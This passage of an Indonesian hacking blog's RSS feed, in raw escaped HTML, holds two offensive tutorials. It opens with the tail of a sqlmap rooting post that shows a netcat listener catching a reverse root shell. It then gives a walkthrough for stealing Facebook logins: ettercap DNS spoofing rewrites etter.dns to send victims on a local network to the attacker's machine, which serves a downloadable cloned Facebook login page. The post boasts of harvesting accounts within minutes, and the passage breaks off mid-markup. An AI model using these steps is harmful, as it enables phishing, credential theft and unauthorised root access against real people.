monospace;"&gt;&lt;b&gt;nc -l -v -p 666&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;listening on [any] 666 ...&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;10.10.1.128: inverse host lookup failed: Unknown host&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: yellow; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;connect to [10.10.1.1] from (UNKNOWN) [10.10.1.128] 49490&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: lime; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;id&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: red; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;span style="line-height: 18px;"&gt;uid=0(root) gid=0(root) groups=0(root)&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-5nGS7MMHNYA/T6ySFNhwJNI/AAAAAAAABbw/hk6MAXNCqDk/s1600/9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="134" src="http://3.bp.blogspot.com/-5nGS7MMHNYA/T6ySFNhwJNI/AAAAAAAABbw/hk6MAXNCqDk/s320/9.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;You are so....&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;pwned by : &lt;span style="color: red;"&gt;red-dragon&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4322924474312123143-6438519971227904208?l=www.root-bt.co.cc' alt='' /&gt;&lt;/div&gt;</description><link>http://www.root-bt.co.cc/2012/05/special-rooting-via-sqlmap.html</link><author>noreply@blogger.com (Double Dragon)</author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-UbMiRqKJjQ0/T6yN4cvgq7I/AAAAAAAABbQ/hSqoPQHvL_0/s72-c/4.png' height='72' width='72'/><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-4322924474312123143.post-7709307254430705023</guid><pubDate>Wed, 09 May 2012 07:48:00 +0000</pubDate><atom:updated>2012-05-09T14:53:48.633+07:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>dns spoof</category><category domain='http://www.blogger.com/atom/ns#'>Fake Login</category><category domain='http://www.blogger.com/atom/ns#'>ettercap</category><category domain='http://www.blogger.com/atom/ns#'>facebook</category><category domain='http://www.blogger.com/atom/ns#'>MITM</category><category domain='http://www.blogger.com/atom/ns#'>hack</category><title>FMITM Hacking Account [Facebook]</title><description>Ada banyak sekali cara melakukan peretasan akun facebook. Cara yang sedang populer adalah menggunakan social engineering attack. Penggunaan social engineering sendiri, mengandalkan kecerobohan korban, agar korban masuk ke dalam jebakan peretas. Cara ini yang paling ampuh, karena tidak ada patch untuk kebodohan manusia. Kali ini saya tidak memberikan tutorial social engineering attack, karena saya tidak expert dalam masalah social engineering, melainkan dengan menggunakan metode saya sendiri. Saya menyebutnya dengan &lt;b&gt;Fisher Man In The Middle&lt;/b&gt;.&lt;span class="fullpost"&gt; &lt;/span&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Concept:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Konsepnya adalah menggabungkan MITM attack dengan fake login attack. Saya mengkloning halaman login facebook, kemudian memodifikasi script login dan menempatkannya pada localhost. Mengapa localhost? IP local lebih cocok dalam melakukan spoofing attack pada metode MITM. Selain itu, membuat domain lebih sulit dan repot ketimbang menggunakan mesin sendiri sebagai server. Setelah membuat halaman login, saya menjalankan metode MITM dengan ettercap, dan melakukan spoofing attack. Sehingga semua user dalam localhost, akan di-redirect menuju IP address saya, dimana IP address saya menuju ke port 80 dan fake login saya sudah siap melakukan tugasnya.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Kelebihan:&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;FMITM tidak membutuhkan file dan web hosting&lt;/li&gt;&lt;li&gt;Dalam prakteknya FMITM dapat menjaring lebih dari 3 user account dalam waktu kurang dari 10 menit.&lt;/li&gt;&lt;li&gt;Cara ini nyaris tidak dapat dihindari, karena metode MITM yang dipakai.&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;MITM [DNS Spoofing]&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Victim -&amp;gt; Packet [Bring me to google] -&amp;gt; Access Point&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Victim &amp;lt;- Packet [Google] &amp;lt;- Access Point&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Diatas, menunjukan sesaat sebelum terjadinya spoofing attack yang dilakukan oleh attacker. Dimana korban mengirim paket berisi "bawa saya menuju google", paket ini dikirim kepada access point. Kemudian access point mendapat packet dari korban, sebagai respon, access point akan menghubungkan korban kepada google.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Victim -&amp;gt; Packet [Bring me to google] -&amp;gt; FMITM aka attacker [Modifying Packet] -&amp;gt; &amp;nbsp;Packet [Bring me to IP attacker] -&amp;gt; Access Point&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Victim &amp;lt;- Packet [IP attacker] &amp;lt;- FMITM aka attacker [Forwarding Packet] &amp;lt;- Packet [IP attacker] Access Point&lt;/i&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Sementara alur diatas menjelaskan FMITM attack.&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;Korban mengirim paket kepada access point (AP), paket berisi "Tolong bawa saya ke google"&lt;/li&gt;&lt;li&gt;Attacker mengambil paket, dan memodifikasinya (inject packet with poison). Paket diubah menjadi "Bawa saya ke IP attacker".&lt;/li&gt;&lt;li&gt;Paket yang telah dimodifikasi oleh Attacker dikirim ke AP.&lt;/li&gt;&lt;li&gt;AP menerima paket, sebagai respon AP mengirim pake balasan dengan isi "IP attacker"&lt;/li&gt;&lt;li&gt;Packet tersebut kembali di-intercept oleh attacker, kali ini attacker tidak memodifikasi paket. Melainkan hanya meneruskan packet tersebut kepada korban.&lt;/li&gt;&lt;li&gt;Korban menerima paket, dan menuju ke IP attacker&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Attacker telah menjalankan service HTTPD, sehingga ketika korban menuju IP address attacker, korban akan melihat halaman index milik attacker. Halaman index attacker telah diubah oleh attacker, sehingga halaman ini dapat melakukan aksi pishing.&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Mengapa MITM?&lt;/i&gt;&lt;/div&gt;&lt;div&gt;Aksi MITM dapat membuat korban menuju fake login page, KEMANAPUN korban mencoba pergi. Dan metode ini tidak mengubah URL korban, sehingga tidak menimbulkan kecurigaan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;i&gt;Mengapa Fake Login?&lt;/i&gt;&lt;/div&gt;&lt;div&gt;Fake login adalah paduan yang cocok dengan metode MITM, mengingat SET milik dave_rel1k masih menerima service cookie. Sehingga terjadi kecacatan dalam output hasil pancingan.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Preparation :&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;ol&gt;&lt;li&gt;&lt;a href="http://ettercap.sourceforge.net/" target="_blank"&gt;ettercap&lt;/a&gt;&amp;nbsp;(dapat ditemukan pada backtrack)&lt;/li&gt;&lt;li&gt;&lt;a href="http://www.apache.org/" target="_blank"&gt;apache&lt;/a&gt;&amp;nbsp;(dapat ditemukan pada backtrack)&lt;/li&gt;&lt;li&gt;Fake login script (dapat di download di&amp;nbsp;&lt;a href="http://red-dragon.bitnet.web.id/tools/facebook-fake-login.zip" target="_blank"&gt;sini&lt;/a&gt;)&lt;/li&gt;&lt;/ol&gt;&lt;div&gt;Note : password archive adalah "red-dragon" (tanpa tanda kutip)&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;EULA (End User License Agreement)&lt;/div&gt;&lt;div&gt;Tutorial ini ditulis dengan tujuan edukasi, panyalah gunaan skill yang terdapat dalam tutorial ini, adalah tanggung jawab pembaca.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;Walktrough&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;a name='more'&gt;&lt;/a&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;1. Setting Up Ettercap&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Ketahuilah IP address anda, ini hal paling dasar dalam melakukan FMITM. Anda juga harus memperhatikan lewat mana anda menyerang. MITM hanya berlaku pada localhost, jika anda menggunakan modem, anda tidak bisa melakukan hal ini lebih jauh. Jika anda menggunakan kabel LAN, maka anda menggunakan interface eth0. Jika anda menggunakan jaringan nirkabel (wifi), maka anda menggunakan interface wlan0. Untuk mengecek IP address, anda dapat menggunakan perintah:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;ifconfig vmnet8 | grep "inet addr:" | awk -F ":" '{print $2}' | sed s/" &amp;nbsp;Bcast"//g&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-jQKHfsasXeU/T6obxFblx-I/AAAAAAAABaU/7ITpol8kkFQ/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="169" src="http://3.bp.blogspot.com/-jQKHfsasXeU/T6obxFblx-I/AAAAAAAABaU/7ITpol8kkFQ/s320/1.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kali ini saya menggunakan Virtual OS untuk menguji keberhasilan metode saya. Hal ini bertujuan agar tidak ada pihak yang dirugikan selama pembuatan tutorial ini. Virtual OS saya menggunakan network adapter NAT, dimana Virtual OS saya dapat menggunakan internet JIKA backtrack saya memiliki akses internet. Saya menggunakan Windows XP Service Pack 2, berbahasa Inggris selama pengujian metode ini.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;IP address saya adalah 10.10.2.1. Selanjutnya saya akan menaruh IP address ini pada config file dns spoof milik ettercap. Untuk dapat meng-input IP address ini, gunakan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;nano /usr/local/share/ettercap/etter.dns&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian arahkan pointer keyboard pada akhir halaman, dan tambahkan:&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Input :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;* A [IP Address Anda]&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-JrQI4q1Sfj4/T6ocYMgMzOI/AAAAAAAABac/-bG45Z0tJ1c/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="169" src="http://1.bp.blogspot.com/-JrQI4q1Sfj4/T6ocYMgMzOI/AAAAAAAABac/-bG45Z0tJ1c/s320/2.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Pengaturan seperti ini akan membuat korban dialihkan ke 10.10.2.1 KEMANAPUN korban pergi. Jika anda hanya ingin mengalihkan korban yang menuju youtube, maka.&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Input :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;*.youtube.com/* A [IP Address Anda]&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Gunakan kemampuan bernalar anda sendiri dalam melakukan pengaturan file ettercap. Setelah selesai, tekan tombol ctrl+x kemudian tekan y, dan enter. File pengaturan anda berhasil tersimpan!&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;b&gt;&lt;span style="font-size: large;"&gt;2. Mengatur fake login&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Setelah mengunduh file dari link yang tersedia dalam persiapan di atas, copy semua file ke folder /var/www. Perlu diperhatikan. Anda harus mengubah ownership file ini menjadi milik www-data agar pishing dapat bekerja sebagaimana mestinya. Untuk mengecek ownership file, gunakan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[~]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;cd /var/www&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div style="font-family: monospace;"&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;ls -l&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-y1BAbfZzIY0/T6odm9drqUI/AAAAAAAABak/zkWMhLxIR3Q/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="169" src="http://3.bp.blogspot.com/-y1BAbfZzIY0/T6odm9drqUI/AAAAAAAABak/zkWMhLxIR3Q/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Perhatikan, semua file ini milik root! Anda harus mengubah ownership file ini menjadi milik www-data dengan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: red;"&gt;&amp;lt;&amp;lt;&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;back&lt;/span&gt;&lt;span style="color: red;"&gt;|&lt;/span&gt;&lt;span style="color: white;"&gt;track&lt;/span&gt;&amp;nbsp;&lt;span style="color: cyan;"&gt;5&lt;/span&gt;&amp;nbsp;&lt;span style="color: red;"&gt;R2&lt;/span&gt;&amp;nbsp;&lt;span style="color: white;"&gt;[/var/www]&lt;/span&gt;&lt;/b&gt;&lt;span style="font-size: 13px;"&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="background-color: black; line-height: 18px;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;b&gt;chown www-data:www-data *&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/div&gt;&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;Kemudian cek kembali ownership file dengan perintah&lt;/div&gt;&lt;div&gt;&lt;br /&gt;&lt;/div&gt;&lt;div&gt;&lt;div class="title" style="background-color: black; border-bottom-color: rgb(204, 204, 204); border-bottom-style: solid; border-bottom-width: 1px; color: green; font-family: Verdana, Arial, sans-serif; font-size: 13px; font-weight: bold; line-height: 18px; margin-bottom: 4px; margin-left: 0px; margin-right: 0px; margin-top: 4px; text-align: left;"&gt;Command :&lt;/div&gt;&lt;div class="body" dir="ltr" style="background-color: black; font-family: monospace; text-align: left;"&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; color: white; display: block; font-family: 'Courier New', Courier, FreeMono, monospace; font-size: 13px; height: auto; line-height: 18px; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace;"&gt;&lt;/span&gt;&lt;/code&gt;&lt;code style="background-attachment: initial; background-clip: initial; background-color: black; background-image: initial; background-origin: initial; display: block; height: auto; max-height: 200px; overflow-x: auto; overflow-y: auto;"&gt;&lt;span style="color: lime; font-family: Monaco, Consolas, Courier, monospace; line-height: 18px;"&gt;&lt;b&gt;&lt;span style="color: 